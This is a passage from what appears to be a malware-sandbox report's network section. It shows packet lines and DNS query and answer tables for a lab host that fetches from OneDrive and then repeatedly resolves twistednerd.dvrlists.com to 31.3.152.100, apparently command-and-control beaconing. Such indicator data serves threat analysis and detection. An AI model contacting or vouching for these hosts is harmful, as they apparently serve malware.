                                  Sep 21, 2021 22:16:03.070544958 CEST53502908.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:03.087017059 CEST53604278.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:03.399343967 CEST5620953192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:03.531050920 CEST53562098.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:04.142199993 CEST5958253192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:04.166423082 CEST53595828.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:04.852277994 CEST6094953192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:04.984008074 CEST53609498.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:05.290129900 CEST5854253192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:05.310076952 CEST53585428.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:06.688348055 CEST5917953192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:06.819529057 CEST53591798.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:07.282896996 CEST6092753192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:07.303368092 CEST53609278.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:08.135153055 CEST5785453192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:08.267622948 CEST53578548.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:09.993916035 CEST6202653192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:10.124789000 CEST53620268.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:10.576878071 CEST5945353192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:10.661528111 CEST53594538.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:11.559062004 CEST6246853192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:11.671216965 CEST5256353192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:11.690999985 CEST53624688.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:11.692545891 CEST53525638.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:12.122994900 CEST5472153192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:12.141154051 CEST53547218.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:12.677517891 CEST6282653192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:12.698688984 CEST53628268.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:13.042880058 CEST6204653192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:13.173664093 CEST53620468.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:14.545365095 CEST5122353192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:14.678241968 CEST53512238.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:15.980515957 CEST6390853192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:16.113316059 CEST53639088.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:17.420207977 CEST4922653192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:17.552184105 CEST53492268.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:18.925055027 CEST6021253192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:19.057770967 CEST53602128.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:20.364007950 CEST5886753192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:20.494051933 CEST53588678.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:21.818285942 CEST5086453192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:21.947622061 CEST53508648.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:23.286195993 CEST6150453192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:23.415009022 CEST53615048.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:24.779416084 CEST6023153192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:24.910470009 CEST53602318.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:27.011946917 CEST5009553192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:27.142555952 CEST53500958.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:28.469935894 CEST5965453192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:28.602499008 CEST53596548.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:29.931039095 CEST5823353192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:30.061834097 CEST53582338.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:31.374743938 CEST5682253192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:31.504631042 CEST53568228.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:32.843729973 CEST6257253192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:32.975001097 CEST53625728.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:34.302947044 CEST5717953192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:34.435005903 CEST53571798.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:35.734312057 CEST5612453192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:35.865314960 CEST53561248.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:37.896574974 CEST6228753192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:38.031744957 CEST53622878.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:38.492863894 CEST5464453192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:38.523652077 CEST53546448.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:39.344706059 CEST5915953192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:39.476430893 CEST53591598.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:39.902637005 CEST5792453192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:39.937939882 CEST53579248.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:40.816515923 CEST5171253192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:40.947170019 CEST53517128.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:42.382486105 CEST5886553192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:42.515451908 CEST53588658.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:43.892992020 CEST6433753192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:44.025924921 CEST53643378.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:45.695313931 CEST5040753192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:45.825886965 CEST53504078.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:47.302278996 CEST6107553192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:47.432734013 CEST53610758.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:48.766875029 CEST5495253192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:48.898102045 CEST53549528.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:50.227271080 CEST5918653192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:50.358386993 CEST53591868.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:51.676893950 CEST5228053192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:51.807924032 CEST53522808.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:53.129528046 CEST5179453192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:53.258599997 CEST53517948.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:54.584326029 CEST5081553192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:54.715018034 CEST53508158.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:56.018671989 CEST5849853192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:56.151295900 CEST53584988.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:57.570435047 CEST5686253192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:57.700181007 CEST53568628.8.8.8192.168.2.7
                                  Sep 21, 2021 22:16:59.018603086 CEST6180753192.168.2.78.8.8.8
                                  Sep 21, 2021 22:16:59.150486946 CEST53618078.8.8.8192.168.2.7
                                  Sep 21, 2021 22:17:00.469460011 CEST5200953192.168.2.78.8.8.8
                                  Sep 21, 2021 22:17:00.601574898 CEST53520098.8.8.8192.168.2.7
                                  Sep 21, 2021 22:17:01.905966043 CEST5864853192.168.2.78.8.8.8
                                  Sep 21, 2021 22:17:02.036047935 CEST53586488.8.8.8192.168.2.7
                                  Sep 21, 2021 22:17:03.404933929 CEST5933753192.168.2.78.8.8.8
                                  Sep 21, 2021 22:17:03.537657976 CEST53593378.8.8.8192.168.2.7
                                  Sep 21, 2021 22:17:04.934432030 CEST5926953192.168.2.78.8.8.8
                                  Sep 21, 2021 22:17:05.091638088 CEST53592698.8.8.8192.168.2.7
                                  Sep 21, 2021 22:17:06.638662100 CEST4980253192.168.2.78.8.8.8
                                  Sep 21, 2021 22:17:06.771140099 CEST53498028.8.8.8192.168.2.7
                                  Sep 21, 2021 22:17:08.093183041 CEST5070653192.168.2.78.8.8.8
                                  Sep 21, 2021 22:17:08.223980904 CEST53507068.8.8.8192.168.2.7
                                  Sep 21, 2021 22:17:09.530169964 CEST5515353192.168.2.78.8.8.8
                                  Sep 21, 2021 22:17:09.661106110 CEST53551538.8.8.8192.168.2.7
                                  Sep 21, 2021 22:17:10.985491037 CEST5974453192.168.2.78.8.8.8
                                  Sep 21, 2021 22:17:11.117923021 CEST53597448.8.8.8192.168.2.7
                                  Sep 21, 2021 22:17:12.152389050 CEST5998753192.168.2.78.8.8.8
                                  Sep 21, 2021 22:17:12.189990044 CEST53599878.8.8.8192.168.2.7
                                  Sep 21, 2021 22:17:12.456861019 CEST6127253192.168.2.78.8.8.8
                                  Sep 21, 2021 22:17:12.589910030 CEST53612728.8.8.8192.168.2.7

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                  Sep 21, 2021 22:14:57.777713060 CEST192.168.2.78.8.8.80x4910Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:14:58.781821012 CEST192.168.2.78.8.8.80x9105Standard query (0)qcisaa.sn.files.1drv.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:24.460186005 CEST192.168.2.78.8.8.80xb34bStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:25.918236971 CEST192.168.2.78.8.8.80x527bStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:27.402903080 CEST192.168.2.78.8.8.80xda9Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:28.868668079 CEST192.168.2.78.8.8.80x7943Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:30.266515970 CEST192.168.2.78.8.8.80x268bStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:30.316066980 CEST192.168.2.78.8.8.80xa0cdStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:31.276998043 CEST192.168.2.78.8.8.80x1c6eStandard query (0)qcisaa.sn.files.1drv.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:32.396702051 CEST192.168.2.78.8.8.80x6a9dStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:33.825437069 CEST192.168.2.78.8.8.80x93eeStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:35.281374931 CEST192.168.2.78.8.8.80x8d53Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:36.714895964 CEST192.168.2.78.8.8.80xdf7fStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:38.206924915 CEST192.168.2.78.8.8.80xb202Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:39.561489105 CEST192.168.2.78.8.8.80x5aceStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:39.755319118 CEST192.168.2.78.8.8.80x22d3Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:40.236155033 CEST192.168.2.78.8.8.80x7cecStandard query (0)qcisaa.sn.files.1drv.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:42.242314100 CEST192.168.2.78.8.8.80x9f88Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:44.241054058 CEST192.168.2.78.8.8.80x4d65Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:45.717200994 CEST192.168.2.78.8.8.80xce7aStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:47.189383984 CEST192.168.2.78.8.8.80x60eeStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:49.464931011 CEST192.168.2.78.8.8.80xf470Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:51.093660116 CEST192.168.2.78.8.8.80xd4bdStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:52.554011106 CEST192.168.2.78.8.8.80x53bbStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:54.077721119 CEST192.168.2.78.8.8.80xe6f1Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:56.061069965 CEST192.168.2.78.8.8.80xfa91Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:58.621579885 CEST192.168.2.78.8.8.80xc4acStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:00.508239031 CEST192.168.2.78.8.8.80xa02cStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:01.966074944 CEST192.168.2.78.8.8.80x9826Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:03.399343967 CEST192.168.2.78.8.8.80x2245Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:04.852277994 CEST192.168.2.78.8.8.80x760dStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:06.688348055 CEST192.168.2.78.8.8.80x95d4Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:08.135153055 CEST192.168.2.78.8.8.80xa131Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:09.993916035 CEST192.168.2.78.8.8.80x6e88Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:11.559062004 CEST192.168.2.78.8.8.80x9067Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:13.042880058 CEST192.168.2.78.8.8.80x3cc4Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:14.545365095 CEST192.168.2.78.8.8.80x10b1Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:15.980515957 CEST192.168.2.78.8.8.80xc2dcStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:17.420207977 CEST192.168.2.78.8.8.80x684cStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:18.925055027 CEST192.168.2.78.8.8.80x2834Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:20.364007950 CEST192.168.2.78.8.8.80xd34eStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:21.818285942 CEST192.168.2.78.8.8.80x7593Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:23.286195993 CEST192.168.2.78.8.8.80xb7a5Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:24.779416084 CEST192.168.2.78.8.8.80x4071Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:27.011946917 CEST192.168.2.78.8.8.80x9fb6Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:28.469935894 CEST192.168.2.78.8.8.80xb6b8Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:29.931039095 CEST192.168.2.78.8.8.80xa294Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:31.374743938 CEST192.168.2.78.8.8.80x3dadStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:32.843729973 CEST192.168.2.78.8.8.80xbcceStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:34.302947044 CEST192.168.2.78.8.8.80x401dStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:35.734312057 CEST192.168.2.78.8.8.80xb093Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:37.896574974 CEST192.168.2.78.8.8.80xb8e1Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:39.344706059 CEST192.168.2.78.8.8.80x723eStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:40.816515923 CEST192.168.2.78.8.8.80xad60Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:42.382486105 CEST192.168.2.78.8.8.80xf8acStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:43.892992020 CEST192.168.2.78.8.8.80x42feStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:45.695313931 CEST192.168.2.78.8.8.80x4c86Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:47.302278996 CEST192.168.2.78.8.8.80x8ea9Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:48.766875029 CEST192.168.2.78.8.8.80x786aStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:50.227271080 CEST192.168.2.78.8.8.80xe138Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:51.676893950 CEST192.168.2.78.8.8.80x7d08Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:53.129528046 CEST192.168.2.78.8.8.80xfd61Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:54.584326029 CEST192.168.2.78.8.8.80x58d3Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:56.018671989 CEST192.168.2.78.8.8.80x1e78Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:57.570435047 CEST192.168.2.78.8.8.80xf320Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:59.018603086 CEST192.168.2.78.8.8.80x1b6cStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:00.469460011 CEST192.168.2.78.8.8.80xac6dStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:01.905966043 CEST192.168.2.78.8.8.80x4dc3Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:03.404933929 CEST192.168.2.78.8.8.80x9474Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:04.934432030 CEST192.168.2.78.8.8.80xbf93Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:06.638662100 CEST192.168.2.78.8.8.80x6b1bStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:08.093183041 CEST192.168.2.78.8.8.80xa300Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:09.530169964 CEST192.168.2.78.8.8.80x8b1dStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:10.985491037 CEST192.168.2.78.8.8.80x3079Standard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:12.456861019 CEST192.168.2.78.8.8.80x5a4eStandard query (0)twistednerd.dvrlists.comA (IP address)IN (0x0001)

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                  Sep 21, 2021 22:14:57.801346064 CEST8.8.8.8192.168.2.70x4910No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                  Sep 21, 2021 22:14:58.828301907 CEST8.8.8.8192.168.2.70x9105No error (0)qcisaa.sn.files.1drv.comsn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                  Sep 21, 2021 22:14:58.828301907 CEST8.8.8.8192.168.2.70x9105No error (0)sn-files.fe.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                  Sep 21, 2021 22:15:24.592149019 CEST8.8.8.8192.168.2.70xb34bNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:26.049549103 CEST8.8.8.8192.168.2.70x527bNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:27.536968946 CEST8.8.8.8192.168.2.70xda9No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:29.001437902 CEST8.8.8.8192.168.2.70x7943No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:30.289251089 CEST8.8.8.8192.168.2.70x268bNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                  Sep 21, 2021 22:15:30.446945906 CEST8.8.8.8192.168.2.70xa0cdNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:31.332803965 CEST8.8.8.8192.168.2.70x1c6eNo error (0)qcisaa.sn.files.1drv.comsn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                  Sep 21, 2021 22:15:31.332803965 CEST8.8.8.8192.168.2.70x1c6eNo error (0)sn-files.fe.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                  Sep 21, 2021 22:15:32.526783943 CEST8.8.8.8192.168.2.70x6a9dNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:33.956198931 CEST8.8.8.8192.168.2.70x93eeNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:35.411300898 CEST8.8.8.8192.168.2.70x8d53No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:36.847167969 CEST8.8.8.8192.168.2.70xdf7fNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:38.337232113 CEST8.8.8.8192.168.2.70xb202No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:39.582477093 CEST8.8.8.8192.168.2.70x5aceNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                  Sep 21, 2021 22:15:39.890031099 CEST8.8.8.8192.168.2.70x22d3No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:40.258913994 CEST8.8.8.8192.168.2.70x7cecNo error (0)qcisaa.sn.files.1drv.comsn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                  Sep 21, 2021 22:15:40.258913994 CEST8.8.8.8192.168.2.70x7cecNo error (0)sn-files.fe.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                  Sep 21, 2021 22:15:42.375560999 CEST8.8.8.8192.168.2.70x9f88No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:44.372531891 CEST8.8.8.8192.168.2.70x4d65No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:45.848701954 CEST8.8.8.8192.168.2.70xce7aNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:47.322001934 CEST8.8.8.8192.168.2.70x60eeNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:49.596828938 CEST8.8.8.8192.168.2.70xf470No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:51.229094982 CEST8.8.8.8192.168.2.70xd4bdNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:52.689614058 CEST8.8.8.8192.168.2.70x53bbNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:54.209207058 CEST8.8.8.8192.168.2.70xe6f1No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:56.198120117 CEST8.8.8.8192.168.2.70xfa91No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:15:58.752718925 CEST8.8.8.8192.168.2.70xc4acNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:00.639976978 CEST8.8.8.8192.168.2.70xa02cNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:02.096715927 CEST8.8.8.8192.168.2.70x9826No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:03.531050920 CEST8.8.8.8192.168.2.70x2245No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:04.984008074 CEST8.8.8.8192.168.2.70x760dNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:06.819529057 CEST8.8.8.8192.168.2.70x95d4No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:08.267622948 CEST8.8.8.8192.168.2.70xa131No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:10.124789000 CEST8.8.8.8192.168.2.70x6e88No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:11.690999985 CEST8.8.8.8192.168.2.70x9067No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:13.173664093 CEST8.8.8.8192.168.2.70x3cc4No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:14.678241968 CEST8.8.8.8192.168.2.70x10b1No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:16.113316059 CEST8.8.8.8192.168.2.70xc2dcNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:17.552184105 CEST8.8.8.8192.168.2.70x684cNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:19.057770967 CEST8.8.8.8192.168.2.70x2834No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:20.494051933 CEST8.8.8.8192.168.2.70xd34eNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:21.947622061 CEST8.8.8.8192.168.2.70x7593No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:23.415009022 CEST8.8.8.8192.168.2.70xb7a5No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:24.910470009 CEST8.8.8.8192.168.2.70x4071No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
